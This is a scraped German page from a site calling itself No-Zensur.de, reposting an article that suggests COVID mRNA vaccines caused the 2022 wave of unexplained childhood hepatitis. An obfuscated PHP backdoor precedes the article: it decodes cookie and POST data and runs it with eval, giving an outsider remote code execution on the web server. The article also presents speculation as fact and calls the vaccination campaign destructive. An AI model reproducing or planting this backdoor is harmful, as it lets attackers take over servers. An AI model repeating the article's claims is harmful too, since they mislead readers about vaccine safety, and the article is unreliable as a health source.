$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Impf-Hepatitis? Immer mehr Fälle von mysteriösen Lebererkrankungen bei Kindern – No-Zensur.de Das freie Wort für eine freie Welt
Start Ansage.org Impf-Hepatitis? Immer mehr Fälle von mysteriösen Lebererkrankungen bei Kindern

Impf-Hepatitis? Immer mehr Fälle von mysteriösen Lebererkrankungen bei Kindern

0
Impf-Hepatitis? Immer mehr Fälle von mysteriösen Lebererkrankungen bei Kindern







Noch mehr menschliches Leid durch die Covid-Impfungen (Symbolbild:Imago)

Seit Mitte des Monats registriert die Weltgesundheitsorganisation (WHO) eine stetig steigende Zahl von Leberentzündungen – eine zuvor unbekannte Typform von Hepatitis, die keiner der gängigen Varianten zuzuordnen ist – bei Kindern. Nicht nur, aber vor allem in Europa treten die Fälle auf – vorrangig in Großbritannien (mit derzeit über 100 Fällen), inzwischen aber auch in Österreich und anderen EU-Staaten. Eine Erklärung für den massiven Anstieg mit derzeit rund 200 registrierten Fällen wurde bislang noch nicht gefunden. Ein Zusammenhang mit den Corona-Impfungen wird offiziell zumeist eilfertig ausgeschlossen.

Allerdings zeigte eine vom Pharmakonzern und Biontech-Partner Pfizer bereits 2020 durchgeführte Studie, dass die Bestandteile der mRNA-Impfstoffe, einschließlich des Spike-Proteins, nicht in der Injektionsstelle verbleiben, sondern sich im ganzen Körper und besonders in der Leber ausbreiten. Eine vorletzte Woche veröffentlichte Studie von Wissenschaftlern der Universitäten Freiburg und München bestätigt diese Beobachtungen: Nach Untersuchung eines 52-jährigen Mannes ohne ernste Vorerkrankungen kamen die Forscher zu dem Ergebnis, dass Leberentzündungen zwar bei einer Corona-Infektion, aber auch infolge der Impfungen auftreten könnten. Dies wird durch die Aktivierung sogenannter T-Zellen ausgelöst, die zu den weißen Blutkörperchen (Leukozyten) gehören und in mehreren Teilen der Leber festgestellt wurden.

Unterforderte Immunabwehr bei Kindern

Da das staatliche britische Gesundheitsunternehmen National Health Service (NHS) Anfang April mit der Impfung von fünf bis elfjährigen Kindern begonnen hat, könnte hier zumindest teilweise eine plausible Erklärung für die außergewöhnlich hohe Zahl von Hepatitis-Fällen bei Kindern in Großbritannien liegen. Der Zusammenhang würde jedenfalls Sinn machen: Die Corona-Maßnahmen wie Maske und Abstand haben die natürliche körpereigene Abwehr gerade bei Kindern (und damit in einem Alter, in dem es eigentlich ständig gefordert und trainiert werden müsste) sträflich unterfordert.

Nun werden sie auch noch mit einem künstlichen Genvakzin traktiert, das das Immunsystem verrückt spielen lässt – was, wie inzwischen feststeht, eine ganze Palette an Autoimmunreaktionen nach sich zieht. Es schein, als seien neben den gehäuften Fällen von Herzmuskelentzündungen nun auch Leberschäden eine Begleiterscheinung der schädlichen und destruktiven Impfkampagne.









Source link